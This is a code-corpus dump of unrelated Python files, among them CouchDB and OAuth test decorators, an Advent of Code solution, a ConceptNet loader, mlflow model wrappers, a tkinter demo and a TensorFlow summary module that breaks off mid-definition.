urllib2.Request("{url}/{resource_data}/{view}?{opts}".format(view=view_name, opts=urllib.urlencode(index_opts), **couch), headers=json_headers) try: res = urllib2.urlopen(req) except Exception, e: log.info("Problem forcing index: %s", e) # view_result = obj.db.view(view_name, **index_opts) # log.error("Indexed: {0}, got back: {1}".format(view_name, json.dumps(res.read()))) else: pass# log.error("Not Indexing: {0}".format( row.key)) def cacheTestData(obj, **kw): req = urllib2.Request("{url}/{resource_data}/_all_docs?include_docs=true".format(**couch), data=json.dumps({"keys":obj.test_data_ids[prefix]}), headers=json_headers) res = urllib2.urlopen(req) docs = list(items(res, 'rows.item.doc')) if not hasattr(obj, "test_data_sorted"): obj.test_data_sorted = {} def sortkey(k): try: return k['node_timestamp'] except: return k['create_timestamp'] obj.test_data_sorted[prefix] = sorted(docs, key=lambda k: sortkey(k)) kw["test_data_sorted"] = obj.test_data_sorted[prefix] return kw def removeTestData(obj): for doc_id in obj.test_data_ids[prefix]: try: del obj.db[doc_id] except Exception as e: print e.message try: del obj.db[doc_id+"-distributable"] except Exception as e: print e.message try: del obj.test_data_ids[prefix] except Exception as e: print e.message try: del obj.test_data_ids[prefix] except Exception as e: print e.message def test_decorator(fn): def test_decorated(self, *args, **kw): try: #print "Wrapper Before...." 
kw = writeTestData(self, **kw) indexTestData(self) kw = cacheTestData(self, **kw) return fn(self, *args, **kw) except : raise finally: removeTestData(self) indexTestData(self) #print "Wrapper After...." return test_decorated return test_decorator def getExtraEnvironment(base_url=None): env = {} if base_url: scheme, netloc, path, query, fragment = urlparse.urlsplit(base_url) if query or fragment: raise ValueError( "base_url (%r) cannot have a query or fragment" % base_url) if scheme: env['wsgi.url_scheme'] = scheme if netloc: if ':' not in netloc: if scheme == 'http': netloc += ':80' elif scheme == 'https': netloc += ':443' else: raise ValueError( "Unknown scheme: %r" % scheme) host, port = netloc.split(':', 1) env['SERVER_PORT'] = port env['SERVER_NAME'] = host env['HTTP_HOST'] = netloc if path: env['SCRIPT_NAME'] = urllib.unquote(path) return env class OAuthRequest(object): def __init__(self, path, http_method="GET", url_base="http://www.example.com", oauth_user_attrib="oauth_user", oauth_info_attrib="oauth" ): self.oauth_user_attrib = oauth_user_attrib self.oauth_info_attrib = oauth_info_attrib self.http_method = http_method self.url_base = url_base self.path = path self.server = couchdb.Server(config['couchdb.url.dbadmin']) self.users = self.server[config['couchdb.db.users']] def __call__(self, fn): def create_user(oauth_user): try: del self.users[oauth_user["_id"]] except: pass finally: print oauth_user self.users.save(oauth_user) def remove_user(oauth_user): try: del self.users[oauth_user["_id"]] except: pass @wraps(fn) def test_decorator(cls, *args, **kwargs): if (hasattr(cls, self.oauth_user_attrib)): self.oauth_user = getattr(cls, self.oauth_user_attrib) else: err = AttributeError() err.message = "Missing attribute '%s' which should be data for CouchDB OAuth User" % self.oauth_user_attrib raise err consumer = oauth2.Consumer(key=self.oauth_user["name"], secret=self.oauth_user["oauth"]["consumer_keys"][self.oauth_user["name"]]) token = oauth2.Token(key="node_sign_token", secret=self.oauth_user["oauth"]["tokens"]["node_sign_token"]) params = { "oauth_signature_method": "HMAC-SHA1", } req = oauth2.Request.from_consumer_and_token(consumer, token, http_method=self.http_method, http_url="{0}{1}".format(self.url_base, self.path), parameters=params) # Sign the request. 
signature_method = oauth2.SignatureMethod_HMAC_SHA1() req.sign_request(signature_method, consumer, token) header = req.to_header() header["Authorization"] = str(header["Authorization"]) extraEnv = getExtraEnvironment(self.url_base) class OauthInfo(object): def __init__(self, consumer, token, request, header, extraEnv, path): self.consumer = consumer self.token = token self.request = request self.header = header self.env = extraEnv self.path = path setattr(cls, self.oauth_info_attrib, OauthInfo(consumer, token, req, header, extraEnv, self.path)) try: create_user(self.oauth_user) result = fn(cls, *args, **kwargs) return result finally: delattr(cls, self.oauth_info_attrib) remove_user(self.oauth_user) return test_decorator class BasicAuthRequest(object): def __init__(self, bauth_user_attrib="bauth_user", bauth_info_attrib="bauth" ): self.bauth_user_attrib = bauth_user_attrib self.bauth_info_attrib = bauth_info_attrib self.server = couchdb.Server(config['couchdb.url.dbadmin']) self.users = self.server[config['couchdb.db.users']] def __call__(self, fn): def build_basic_auth_header(name, password): base64string = base64.encodestring('%s:%s' % (name, password))[:-1] return {"Authorization": "Basic %s" % base64string} def create_user(name, password, roles=[]): user_doc = { "_id" : "org.couchdb.user:{0}".format(name), "type" : "user", "name" : "{0}".format(name), "roles" : roles, "password" : password } try: del self.users[user_doc["_id"]] except: pass finally: _, user_doc["_rev"] = self.users.save(user_doc) return user_doc def delete_user(user_doc): try: del self.users[user_doc["_id"]] except: pass class BAuthInfo(object): def __init__(self, header, name, password): self.header = header self.username = name self.password = password @wraps(fn) def wrap(cls, *args, **kwargs): try: self.bauth_user = getattr(cls, self.bauth_user_attrib) except: raise AttributeError("Attribute containing Basic Auth user credentials missing.") user_doc = create_user(**self.bauth_user) header = build_basic_auth_header(**self.bauth_user) setattr(cls, self.bauth_info_attrib, BAuthInfo(header, **self.bauth_user)) try: return fn(cls, *args, **kwargs) except Exception as e: raise e finally: delete_user(user_doc) return wrap def _backup(prop_list=[]): backup = {} for prop in prop_list: backup[prop] = config["app_conf"][prop] return backup def _restore(backup={}): config["app_conf"].update(backup) class make_gpg_keys(object): '''decorator that makes at least 1 gpg key. 
first key is set at the node key''' def __init__(self, count=1): self.count = count self.gnupghome = tempfile.mkdtemp(prefix="gnupg_", dir=".") self.gpgbin = "gpg" self.gpg = gnupg.GPG(gnupghome=self.gnupghome, gpgbinary=self.gpgbin) self.gpg.encoding = 'utf-8' self.keys = [] def __call__(self, f): @wraps(f) def wrapped(*args, **kw): for i in range(self.count): cfg = { "key_type": "RSA", "key_length": 1024, "name_real": "Test Key #%d" % i, "name_comment": "Test key for %s" % f.__class__.__name__, "name_email": "<EMAIL>" % i, "passphrase": "<PASSWORD>" } key = self.gpg.gen_key(self.gpg.gen_key_input(**cfg)) assert key is not None, "GPG key not generated" assert key.fingerprint is not None, "Key missing fingerprint" cfg.update({ "key": key, "fingerprint": key.fingerprint, "key_id": key.fingerprint[-16:], "locations": ["http://www.example.com/pubkey/%s" % key.fingerprint[-16:] ], "owner": "%s (%s)" % (cfg["name_real"], cfg["name_email"]) }) self.keys.append(cfg) kw["pgp_keys"] = self.keys kw["gnupghome"] = self.gnupghome kw["gpgbin"] = self.gpgbin kw["gpg"] = self.gpg backup_props = [ "lr.publish.signing.privatekeyid", "lr.publish.signing.passphrase", "lr.publish.signing.gnupghome", "lr.publish.signing.gpgbin", "lr.publish.signing.publickeylocations", "lr.publish.signing.signer" ] backup_conf = _backup(backup_props) config["app_conf"].update({ "lr.publish.signing.privatekeyid": self.keys[0]["key_id"], "lr.publish.signing.passphrase": self.keys[0]["passphrase"], "lr.publish.signing.gnupghome": self.gnupghome, "lr.publish.signing.gpgbin": self.gpgbin, "lr.publish.signing.publickeylocations": '''["http://localhost/pubkey"]''', "lr.publish.signing.signer": self.keys[0]["owner"] }) reloadGPGConfig(config["app_conf"]) try: return f(*args, **kw) finally: shutil.rmtree(self.gnupghome) _restore(backup_conf) reloadGPGConfig(config["app_conf"]) return wrapped
StarcoderdataPython
1667766
# Advent of Code 2021 - Day 2 Part 2
# Author: <NAME>
# Created: 12/02/2021
# Last Modified: 12/02/2021
# Purpose:
#   Read in submarine instructions from a file
#   Commands:
#       Forward -> Increase horizontal position,
#                  Change vertical position by the product of aim and the Forward amount
#       Up -> Decrease aim position
#       Down -> Increase aim position
#   Determine final horizontal and vertical (depth) position
#   Determine the product of the final horizontal and vertical (depth) position

# get data from file
sample = 'day2-sample.txt'
actual = 'day2-input.txt'
fileName = actual

try:
    fh = open(fileName)
except OSError:
    raise SystemExit(f'File {fileName} not found')

commands = [x.split() for x in fh]
fh.close()

# start logic
movements = {'forward': 0, 'aim': 0, 'depth': 0}
for command in commands:
    if command[0] == 'forward':
        movements['forward'] = movements.get('forward', 0) + int(command[1])
        movements['depth'] = movements.get('depth', 0) + (movements.get('aim', 0) * int(command[1]))
    elif command[0] == 'up':
        movements['aim'] = movements.get('aim', 0) - int(command[1])
    elif command[0] == 'down':
        movements['aim'] = movements.get('aim', 0) + int(command[1])

print(movements)
print(f'Final Horizontal: {movements["forward"]} \nFinal Depth: {movements["depth"]}')
print(f'Horizontal * Depth = {movements["forward"] * movements["depth"]}')
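# Worked example (not in the original file): the six-command sample course
# from the puzzle statement, run through the same part-2 aim semantics as
# above. It verifies horizontal 15, depth 60, product 900.
sample_course = [('forward', 5), ('down', 5), ('forward', 8),
                 ('up', 3), ('down', 8), ('forward', 2)]
h = aim = depth = 0
for cmd, x in sample_course:
    if cmd == 'forward':
        h += x
        depth += aim * x
    elif cmd == 'up':
        aim -= x
    elif cmd == 'down':
        aim += x
assert (h, depth, h * depth) == (15, 60, 900)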
StarcoderdataPython
74926
# Copyright (c) 2020 <NAME> # # This software is released under the MIT License. # https://opensource.org/licenses/MIT from __future__ import annotations import argparse import csv import gzip import json import os import re import sqlite3 as sqlite from .app import database, APP_DIRECTORY from .models.assertions import Assertion, Dataset, License, Relation, Source from .models.concepts import Concept, Language, PartOfSpeech parser = argparse.ArgumentParser() parser.add_argument("conceptnet", action="store", type=str, help="Compiled ConceptNet assertions file (csv.gz)") parser.add_argument("description", action="store", type=str, help="Directory containing the description files (csv)") parser.add_argument("--commit-size", action="store", type=int, default=1000, help="The batch size of the database commit") INITIALIZATION_SQL = os.path.join(APP_DIRECTORY, "initialization.sql") TRANSFORMATION_SQL = os.path.join(APP_DIRECTORY, "transformation.sql") ENGLISH_REGEX = re.compile(r"^/a/\[/r/.+/,/c/en/.+/,/c/en/.+/\]$") CONCEPT_REGEX = re.compile(r"^/c/([^/]+)/([^/]+)/?([^/]+)?/?(.+)?$") if __name__ == "__main__": args = parser.parse_args() LANGUAGE = os.path.join(args.description, "languages.csv") RELATION = os.path.join(args.description, "relations.csv") PART_OF_SPEECH = os.path.join(args.description, "part-of-speeches.csv") # process data using in-memory database with sqlite.connect(":memory:") as temp_database: temp_database.row_factory = sqlite.Row cursor = temp_database.cursor() with open(INITIALIZATION_SQL, "r") as script: cursor.executescript(script.read()) temp_database.commit() with open(LANGUAGE, "r") as file: for language in csv.reader(file): cursor.execute( "INSERT INTO languages(code, name) VALUES(?,?)", language ) with open(RELATION, "r") as file: for relation, directed in csv.reader(file): cursor.execute( "INSERT INTO relations(relation, directed) VALUES(?,?)", (relation, directed == "directed") ) with open(PART_OF_SPEECH, "r") as file: for part_of_speech in csv.reader(file): cursor.execute( "INSERT INTO part_of_speeches(code, name) VALUES(?,?)", part_of_speech ) temp_database.commit() with gzip.open(args.conceptnet, "rt") as conceptnet: reader = csv.reader(conceptnet, delimiter='\t') filtered = filter(lambda x: re.match(ENGLISH_REGEX, x[0]), reader) for id, assertion in enumerate(filtered): print(f"{id + 1} English assertions processed", end='\r') assertion, relation, source, target, data = assertion if relation == "/r/ExternalURL": continue data = json.loads(data) cursor.execute( "INSERT INTO assertions VALUES(" + "?," * 18 + "?)", (id + 1, assertion, relation[3:], source, *re.match(CONCEPT_REGEX, source).groups(), target, *re.match(CONCEPT_REGEX, target).groups(), data["dataset"][3:], data["license"], data["weight"], data["surfaceText"] if "surfaceText" in data else None, data["surfaceStart"] if "surfaceStart" in data else None, data["surfaceEnd"] if "surfaceEnd" in data else None) ) for index, source in enumerate(data["sources"]): for field, value in source.items(): cursor.execute( ("INSERT INTO sources" "(assertion_id, [index], field, value) " "VALUES(?,?,?,?)"), (id + 1, index + 1, field, value) ) print() temp_database.commit() with open(TRANSFORMATION_SQL, "r") as script: cursor.executescript(script.read()) temp_database.commit() # populate app database database.drop_all() database.create_all() for r in cursor.execute("SELECT * FROM languages"): database.session.add(Language(**r)) for r in cursor.execute("SELECT * FROM relations"): database.session.add(Relation(**r)) for r in 
cursor.execute("SELECT * FROM part_of_speeches"): database.session.add(PartOfSpeech(**r)) for r in cursor.execute("SELECT * FROM datasets"): database.session.add(Dataset(**r)) for r in cursor.execute("SELECT * FROM licenses"): database.session.add(License(**r)) for i, r in enumerate(cursor.execute("SELECT * FROM concepts")): print(f"{i + 1} concepts inserted", end='\r') database.session.add(Concept(**r)) if (i + 1) % args.commit_size == 0: database.session.commit() print() for i, r in enumerate(cursor.execute("SELECT * FROM assertions")): print(f"{i + 1} assertions inserted", end='\r') database.session.add(Assertion(**r)) if (i + 1) % args.commit_size == 0: database.session.commit() print() for i, r in enumerate(cursor.execute("SELECT * FROM sources")): print(f"{i + 1} assertion source inserted", end='\r') database.session.add(Source(**r)) if (i + 1) % args.commit_size == 0: database.session.commit() print() database.session.commit()
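# Illustration (not in the original file) of what CONCEPT_REGEX extracts from
# a concept URI; the URIs below are hypothetical examples in ConceptNet's
# /c/<language>/<term>/<pos>/<sense> layout:
#
# >>> re.match(CONCEPT_REGEX, "/c/en/example/n/wikt").groups()
# ('en', 'example', 'n', 'wikt')
# >>> re.match(CONCEPT_REGEX, "/c/en/example").groups()
# ('en', 'example', None, None)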
StarcoderdataPython
27779
from typing import List, Tuple

import mlflow
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
from interpret.glassbox import ExplainableBoostingClassifier, ExplainableBoostingRegressor

from ..OEA_model import OEAModelInterface, ModelType, ExplanationType
from ..modeling_utils import log_metrics


class mlflow_pyfunc_wrapper(mlflow.pyfunc.PythonModel):
    """
    Wrapper class that allows us to use generic predictors in the mlflow pyfunc format.
    Used to wrap predictor types that are not already in the mlflow.* setup.
    To work with this class, the wrapped model needs generic
    predict, fit, score, and predict_proba functions.
    """

    def __init__(self, model):
        """
        Initialize the wrapped Python model

        Parameters
        ----------
        model: Python Object
            A model that implements the predict, fit, score, and predict_proba functions
        """
        self.model = model

    def predict(self, *args):
        """
        Use the predict function of the wrapped model

        Parameters
        ----------
        *args :
            Arguments needed for the wrapped predict function

        Returns
        -------
        predictions: pandas.DataFrame or numpy.ndarray
            Predictions of the wrapped model on the passed arguments
        """
        predictions = self.model.predict(*args)
        return predictions

    def fit(self, *args):
        """
        Train/fit the wrapped model on the passed arguments

        Parameters
        ----------
        *args :
            Arguments needed for the wrapped fit (train) function

        Returns
        -------
        Wrapped model after being fit on the passed arguments
        """
        return self.model.fit(*args)

    def score(self, *args):
        """
        Predicts and scores the wrapped model on the passed arguments

        Parameters
        ----------
        *args :
            Arguments needed for the wrapped score function

        Returns
        -------
        score: Float
            Resulting score of the wrapped model's score function (generally accuracy)
        """
        score = self.model.score(*args)
        return score

    def predict_proba(self, *args):
        """
        Generate prediction probabilities of the wrapped model on the passed arguments

        Parameters
        ----------
        *args :
            Arguments needed for the wrapped prediction probability function

        Returns
        -------
        probabilities: pandas.DataFrame or numpy.ndarray
            Predicted output probabilities
        """
        probabilities = self.model.predict_proba(*args)
        return probabilities


class wrapped_basic(OEAModelInterface):
    def __init__(self, modelname):
        """
        Initialize basic wrapped pyfunc model utilities (base class)

        Parameters
        ----------
        modelname: String
            Name of the model for registration and saving purposes
        """
        self.predictor = None
        self.modelname = modelname

    def load_split_data(self, X, Y, A, key, split=.4, stratify=None):
        """
        Splits data into training, validation, and test sets

        Parameters
        ----------
        X: pandas.DataFrame
            Feature data
        Y: pandas.DataFrame
            Label data
        A: pandas.DataFrame
            Sensitive feature data (may or may not overlap with X)
        key: String or List[Strings]
            Columns to identify as keys for all three dataframes. Dropped at loading time.
        split: Float
            Percentage of data to exclude for the testing set
        stratify: pandas.DataFrame
            Dataframe used to stratify the split of the data, i.e. if labels are
            provided, will ensure equal label distribution in the train / test sets.
        Returns
        -------
        X_train: pandas.DataFrame
            Feature data for training set
        X_val: pandas.DataFrame
            Feature data for validation set
        X_test: pandas.DataFrame
            Feature data for test set
        y_train: pandas.DataFrame
            Label data for training set
        y_val: pandas.DataFrame
            Label data for validation set
        y_test: pandas.DataFrame
            Label data for test set
        A_train: pandas.DataFrame
            Sensitive feature data for training set
        A_val: pandas.DataFrame
            Sensitive feature data for validation set
        A_test: pandas.DataFrame
            Sensitive feature data for test set
        classes: List[str]
            List of classes for classification problem outcomes
        """
        if not (A is None):
            (
                X_train,
                X_val_test,
                y_train,
                y_val_test,
                A_train,
                A_val_test,
            ) = train_test_split(
                X,
                Y,
                A,
                test_size=split,
                random_state=12345,
                stratify=stratify,
            )
            (X_val, X_test, y_val, y_test, A_val, A_test) = train_test_split(
                X_val_test, y_val_test, A_val_test, test_size=0.5, random_state=12345
            )
        else:
            (X_train, X_val_test, y_train, y_val_test) = train_test_split(
                X,
                Y,
                test_size=split,
                random_state=12345,
                stratify=stratify,
            )
            (X_val, X_test, y_val, y_test) = train_test_split(
                X_val_test, y_val_test, test_size=0.5, random_state=12345
            )

        X_train = X_train.drop(key, axis='columns').reset_index(drop=True)
        X_val = X_val.drop(key, axis='columns').reset_index(drop=True)
        X_test = X_test.drop(key, axis='columns').reset_index(drop=True)

        y_train = y_train.drop(key, axis='columns')
        y_train = y_train[y_train.columns[:1]].reset_index(drop=True)
        y_val = y_val.drop(key, axis='columns').reset_index(drop=True)
        y_val = y_val[y_val.columns[:1]].reset_index(drop=True)
        y_test = y_test.drop(key, axis='columns').reset_index(drop=True)
        y_test = y_test[y_test.columns[:1]].reset_index(drop=True)

        classes = None

        self.X_train = X_train
        self.X_val = X_val
        self.X_test = X_test
        self.y_train = y_train.values.reshape(-1)
        self.y_val = y_val.values.reshape(-1)
        self.y_test = y_test.values.reshape(-1)
        self.classes = classes

        if not (A is None):
            A_train = A_train.drop(key, axis='columns').reset_index(drop=True)
            A_val = A_val.drop(key, axis='columns').reset_index(drop=True)
            A_test = A_test.drop(key, axis='columns').reset_index(drop=True)
            self.A_train = A_train
            self.A_val = A_val
            self.A_test = A_test
        else:
            A_train = None
            A_val = None
            A_test = None
            self.A_train = A_train
            self.A_val = A_val
            self.A_test = A_test

        return (
            X_train,
            X_val,
            X_test,
            y_train,
            y_val,
            y_test,
            A_train,
            A_val,
            A_test,
            classes,
        )

    def infer(self, data):
        """
        Infer using model

        Parameters
        ----------
        data: pandas.DataFrame OR numpy array
            Feature data

        Returns
        -------
        predictions: pandas.DataFrame OR numpy array
            Results of running inference of the predictor
        """
        return self.predictor.predict(data)

    def train(self):
        """
        Trains model based on data originally loaded using load_split_data.
        Logs training metrics.

        Returns
        -------
        self.predictor: sklearn Predictor
            Trained predictor model object
        """
        X_train_val = pd.concat([self.X_train, self.X_val], axis=0)
        y_train_val = np.concatenate([self.y_train, self.y_val], axis=0)
        self.predictor.fit(X_train_val, y_train_val)
        log_metrics(self, dataset="training_val")
        return self.predictor

    def test(self):
        """
        Evaluates model on the test set originally loaded using load_split_data.
        Logs testing metrics and returns predictions on the test set.
        Returns
        -------
        preds: pandas.DataFrame OR numpy array
            Results of running inference of the predictor
        """
        preds = log_metrics(self, dataset="test")
        return preds

    def save_model(self, foldername):
        """
        Save wrapped pyfunc model to a path

        Parameters
        ----------
        foldername: String
            Name of intermediate folder to save model to using mlflow utilities.
        """
        mlflow.pyfunc.save_model(foldername, python_model=self.predictor)

    def register_model(self, foldername):
        """
        Register model to the repository attached to the mlflow instance

        Parameters
        ----------
        foldername: String
            Path of folder to upload to model repository
        """
        mlflow.pyfunc.log_model(foldername, python_model=self.predictor, registered_model_name=self.modelname)

    def load_model(self, modelname, version):
        """
        Load model from a registered endpoint

        Parameters
        ----------
        modelname: String
            name of model to load from remote repository
        version: String
            version of model to load from the mlflow model repository.

        Returns
        -------
        self.predictor: Wrapped PyFunc Predictor
            Returns the predictor loaded from the registered endpoint
        """
        model_version_uri = "models:/{model_name}/{version}".format(model_name=modelname, version=version)
        self.predictor = mlflow.pyfunc.load_model(model_version_uri)
        return self.predictor


class classification_EBM(wrapped_basic):
    """
    Model class for an EBM used for binary classification.
    Inherits from the base wrapped model class (OEA interface type).
    Classification type with Explainable Boosting Machine special explanation type
    """

    model_type = ModelType.binary_classification
    explanation_type = ExplanationType.ebm

    def init_model(self, seed=5):
        """Initialize Model"""
        self.predictor = mlflow_pyfunc_wrapper(ExplainableBoostingClassifier(random_state=seed))


class multi_classification_EBM(wrapped_basic):
    """
    Model class for an EBM used for multiclass classification.
    Inherits from the base wrapped model class (OEA interface type).
    Multiclass classification type with Explainable Boosting Machine special explanation type
    """

    model_type = ModelType.multiclass_classification
    explanation_type = ExplanationType.ebm

    def init_model(self, seed=5):
        """Initialize Model"""
        self.predictor = mlflow_pyfunc_wrapper(ExplainableBoostingClassifier(random_state=seed))


class regression_EBM(wrapped_basic):
    """
    Model class for an EBM used for regression.
    Inherits from the base wrapped model class (OEA interface type).
    Regression type with Explainable Boosting Machine special explanation type
    """

    model_type = ModelType.regression
    explanation_type = ExplanationType.ebm

    def init_model(self, seed=5):
        """Initialize Model"""
        self.predictor = mlflow_pyfunc_wrapper(ExplainableBoostingRegressor(random_state=seed))
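# Usage sketch (not in the original source). It assumes an mlflow tracking
# server is configured and that X, Y, A and key match the shapes expected by
# load_split_data; all names below are placeholders:
#
# model = classification_EBM("my-ebm-model")
# model.init_model(seed=5)
# model.load_split_data(X, Y, A, key=["student_id"], split=0.4)
# model.train()                       # fits on train+val, logs metrics
# preds = model.test()                # logs test metrics, returns predictions
# model.register_model("ebm_model")   # pushes to the mlflow model registry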
StarcoderdataPython
169038
""" Copyright 2019 <NAME>. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from abc import ABCMeta, abstractmethod from typing import Iterable, Union from gs_quant.risk import Formatters, RiskRequest class RiskApi(metaclass=ABCMeta): @classmethod @abstractmethod def calc(cls, request: RiskRequest) -> Union[Iterable, str]: raise NotImplementedError('Must implement calc') @classmethod @abstractmethod def get_results(cls, risk_request: RiskRequest, result_id: str) -> dict: raise NotImplementedError('Must implement get_results') @classmethod def _handle_results(cls, request: RiskRequest, results: Iterable) -> dict: formatted_results = {} for measure_idx, position_results in enumerate(results): risk_measure = request.measures[measure_idx] formatter = Formatters.get(risk_measure) for position_idx, result in enumerate(position_results): position = request.positions[position_idx] result = formatter(result) if formatter else result formatted_results.setdefault(risk_measure, {})[position] = result return formatted_results
StarcoderdataPython
4805410
<gh_stars>1-10 from collections import Counter class Solution: def frequencySort(self, s: str) -> str: counter = Counter(s) return "".join( k * v for k, v in sorted( counter.items(), key=lambda x: x[1], reverse=True ) ) def frequencySort1Line(self, s: str) -> str: return "".join(k * v for k, v in Counter(s).most_common()) # TESTS tests = [("tree", "eetr"), ("cccaaa", "cccaaa"), ("Aabb", "bbAa")] for t in tests: sol = Solution() actual = sol.frequencySort(t[0]) print("Sort characters in", t[0], "by frequency ->", actual) assert actual == t[1]
StarcoderdataPython
4840916
"""Form fields for using django-gm2m with QuerySetSequence.""" from dal_gm2m.fields import GM2MFieldMixin from dal_queryset_sequence.fields import QuerySetSequenceModelMultipleField class GM2MQuerySetSequenceField(GM2MFieldMixin, QuerySetSequenceModelMultipleField): """Form field for QuerySetSequence to django-generic-m2m relation."""
StarcoderdataPython
3260786
"""Module containing class `Preset`.""" from vesper.util.named import Named class Preset(Named): """ Preset parent class. A *preset* is a collection of logically related configuration data, for example for user interface or algorithm configuration. A preset is of a particular *preset type*, according to the type of information it contains. For example, a system may offer preset types for the configuration of different parts of its user interface, or for the configuration of different parametric algorithms. A preset type is implemented in Python as a subclass of the `Preset` class, and presets of that type are instances of the class. Presets are managed by a *preset manager*, which loads presets from a persistent store and provides them to clients upon request. The preset manager requires that each preset class define an initializer of the form def __init__(self, name, data): ... which the manager uses to create presets. The initializer accepts a preset name and serialized preset data, both of which are obtained by the preset manager from the persistent store. The initializer of a preset class should always invoke the initializer of its superclass. When preset data include key/value pairs where the keys are intended to function as programming language identifiers (when the keys are setting names, for example), the identifiers should be written in snake case. The `camel_case_data` property of a preset gets the preset data with such identifiers translated to camel case. Subclasses that need to perform such translation should define their own `camel_case_data` property. The default implementation of the property returns the preset data with no translation. """ extension_name = None """ The extension name of this preset type. A preset type is an extension, and thus must have an extension name. The name should be capitalized and describe the contents of the preset, for example "Annotation Commands" or "Annotation Scheme". The name is presented in user interfaces as the name of a preset type, and is also the name of the directory that contains presets of this type. """ def __init__(self, name, data): super().__init__(name) self.data = data @property def camel_case_data(self): return self.data
StarcoderdataPython
162129
# -*- coding: UTF-8 -*-
# ------------------------(max to 80 columns)-----------------------------------
# author by : (student ID)
# created: 2019.11
# Description:
#     First steps with WinForm-style programming ( Listbox )
# ------------------------(max to 80 columns)-----------------------------------
import tkinter as tk
from tkinter import ttk

# create root window
top_win = tk.Tk()
# naming root window
top_win.title('Hello World Window')
# resize root window
win_size_pos = '800x600'
#win_size_pos = '360x60'
top_win.geometry(win_size_pos)

'''
selectmode determines how many items can be selected and how mouse dragging
affects the selection:
    BROWSE: normally you can select only one line in a Listbox. If you click
        an item and then drag to a different line, the selection follows the
        mouse. This is the default.
    SINGLE: you can select only one line, and you cannot drag with the mouse;
        wherever you click button 1, that line is selected.
    MULTIPLE: you can select any number of lines at once. Clicking on any
        line toggles whether it is selected.
    EXTENDED: you can select any adjacent group of lines at once by clicking
        on the first line and dragging to the last line.
'''
sb = tk.Scrollbar(top_win)
sb.place(x=60, y=20, height=500)

lb = tk.Listbox(top_win, selectmode=tk.BROWSE, yscrollcommand=sb.set)
for i in range(50):
    lb.insert('end', '%03d' % i)
#lb.pack(side='left', fill='both')
lb.place(x=20, y=20, width=40, height=500)

# connect sb & lb
sb.config(command=lb.yview)

# show window and get into event loop
top_win.mainloop()
StarcoderdataPython
1696743
""" Copyright: MAXON Computer GmbH Author: <NAME> Description: - Hides the objects of the active LOD object 'op' current level. Class/method highlighted: - LodObject.GetCurrentLevel() - LodObject.GetShowControlDescID() Compatible: - Win / Mac - R19, R20, R21, S22 """ import c4d def main(): # Checks if there is an active object if not op: return # Checks if active object is a LOD object if not op.CheckType(c4d.Olod): return # Gets active LOD object current level currentLevel = op.GetCurrentLevel() # Hides current level showControlID = op.GetShowControlDescID(currentLevel) if showControlID is not None: op[showControlID] = False # Pushes an update event to Cinema 4D c4d.EventAdd() if __name__ == '__main__': main()
StarcoderdataPython
1683472
<reponame>dhzzy88/Bike2Car<gh_stars>1-10 # -*- coding: UTF-8 -*- # File: summary.py import six import tensorflow as tf import re import io from six.moves import range from contextlib import contextmanager from tensorflow.python.training import moving_averages from ..utils import logger from ..utils.develop import log_deprecated from ..utils.argtools import graph_memoized from ..utils.naming import MOVING_SUMMARY_OPS_KEY from .tower import get_current_tower_context from .symbolic_functions import rms from .scope_utils import cached_name_scope __all__ = ['add_tensor_summary', 'add_param_summary', 'add_activation_summary', 'add_moving_summary'] # some scope stuff to use internally... @graph_memoized def _get_cached_vs(name): with tf.variable_scope(name) as scope: return scope @contextmanager def _enter_vs_reuse_ns(name): vs = _get_cached_vs(name) # XXX Not good to enter the cached vs directly, because this will clean-up custom getter # with tf.variable_scope(name, reuse=tf.AUTO_REUSE): # available in 1.4 only with tf.variable_scope(vs): with tf.name_scope(vs.original_name_scope): yield vs def create_scalar_summary(name, v): """ Args: name (str): v (float): scalar value Returns: tf.Summary: a tf.Summary object with name and simple scalar value v. """ assert isinstance(name, six.string_types), type(name) v = float(v) s = tf.Summary() s.value.add(tag=name, simple_value=v) return s def create_image_summary(name, val): """ Args: name(str): val(np.ndarray): 4D tensor of NHWC. assume RGB if C==3. Can be either float or uint8. Range has to be [0,255]. Returns: tf.Summary: """ assert isinstance(name, six.string_types), type(name) n, h, w, c = val.shape val = val.astype('uint8') s = tf.Summary() for k in range(n): arr = val[k] if arr.shape[2] == 1: # scipy doesn't accept (h,w,1) arr = arr[:, :, 0] tag = name if n == 1 else '{}/{}'.format(name, k) buf = io.BytesIO() # scipy assumes RGB scipy.misc.toimage(arr).save(buf, format='png') img = tf.Summary.Image() img.height = h img.width = w # 1 - grayscale 3 - RGB 4 - RGBA img.colorspace = c img.encoded_image_string = buf.getvalue() s.value.add(tag=tag, image=img) return s def add_tensor_summary(x, types, name=None, collections=None, main_tower_only=True): """ Summarize a tensor by different methods. Args: x (tf.Tensor): a tensor to summarize types (list[str]): summary types, can be scalar/histogram/sparsity/mean/rms name (str): summary name. Defaults to be the op name. collections (list[str]): collections of the summary ops. main_tower_only (bool): Only run under main training tower. If set to True, calling this function under other TowerContext has no effect. Examples: .. 
code-block:: python with tf.name_scope('mysummaries'): # to not mess up tensorboard add_tensor_summary( tensor, ['histogram', 'rms', 'sparsity'], name='mytensor') """ types = set(types) if name is None: name = x.op.name ctx = get_current_tower_context() if ctx is not None and not ctx.is_main_training_tower: return SUMMARY_TYPES_DIC = { 'scalar': lambda: tf.summary.scalar(name + '-summary', x, collections=collections), 'histogram': lambda: tf.summary.histogram(name + '-histogram', x, collections=collections), 'sparsity': lambda: tf.summary.scalar( name + '-sparsity', tf.nn.zero_fraction(x), collections=collections), 'mean': lambda: tf.summary.scalar( name + '-mean', tf.reduce_mean(x), collections=collections), 'rms': lambda: tf.summary.scalar( name + '-rms', rms(x), collections=collections) } for typ in types: SUMMARY_TYPES_DIC[typ]() def add_activation_summary(x, types=None, name=None, collections=None): """ Call :func:`add_tensor_summary` under a reused 'activation-summary' name scope. This function is a no-op if not calling from main training tower. Args: x (tf.Tensor): the tensor to summary. types (list[str]): summary types, defaults to ``['sparsity', 'rms', 'histogram']``. name (str): if is None, use x.name. collections (list[str]): collections of the summary ops. """ ndim = x.get_shape().ndims if ndim < 2: logger.warn("Cannot summarize scalar activation {}".format(x.name)) return if types is None: types = ['sparsity', 'rms', 'histogram'] with cached_name_scope('activation-summary'): add_tensor_summary(x, types, name=name, collections=collections) def 